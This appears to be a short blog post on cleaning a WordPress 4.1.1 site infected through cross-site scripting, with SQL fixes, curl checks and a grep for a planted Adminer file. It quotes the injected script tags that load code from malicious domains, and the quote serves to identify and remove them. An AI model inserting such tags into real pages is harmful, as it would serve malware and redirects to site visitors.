This works for infection with *.buyittraffic.com and *.gotosecond2.com

If you have an ancient WordPress 4.1.1 you and your website has become a victim of cross-site scripting here is how to clean it.

First, update your WordPress to one which is not vulnerable, such version is 4.1.28 which can be downloaded from here

In my case the victim was http://www.YOURWEBSITE.com/ and links were changed to go to http://land.buyittraffic.com

Fix the Links

Go to MySQL cli or your phpMyAdmin and recover the website URL and your home page url:

UPDATE wp_options SET option_value = 'http://www.YOURWEBSITE.com/' WHERE `wp_options`.`option_name` = 'siteurl';

UPDATE wp_options SET option_value = 'http://www.YOURWEBSITE.com/' WHERE `wp_options`.`option_name` = 'home';

This will fix the links on the website and administration will start to work.

At this point, you can open your website but DO NOT CLICK on any link. All posts/pages are infected.

Fix the content

To all of them have been appended nasty javascript and you have to clean them. To find the malware code which we have to delete run a curl command to see the HTML of the webpage. Copy one page/post url and check the source with “curl”

curl https://www.YOURWEBSITE.com/page?id=123

You will see something like this at the end

<script src='https://js.greenlabelfrancisco.com/clizkes' type='text/javascript'></script>
<script src='https://dl.gotosecond2.com/clizkes' type='text/javascript'></script>

Then run those commands in the mysql console:


UPDATE wp_posts 
  SET post_content = REPLACE(post_content,
      "<script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043' type='text/javascript'></script><script src='https://land.buyittraffic.com/clizkes' type='text/javascript'></script>",
      '');


Check to see if you have nasty code with

curl http://www.YOURWEBSITE.com/

If you don’t see the malware then it is safe to open in the browser again.

Check for Adminer

Check to see if your site contain remote administration php

grep -lri Adminer wordpress/

In my case the file was named ad.php

Delete it!

Happy 2020!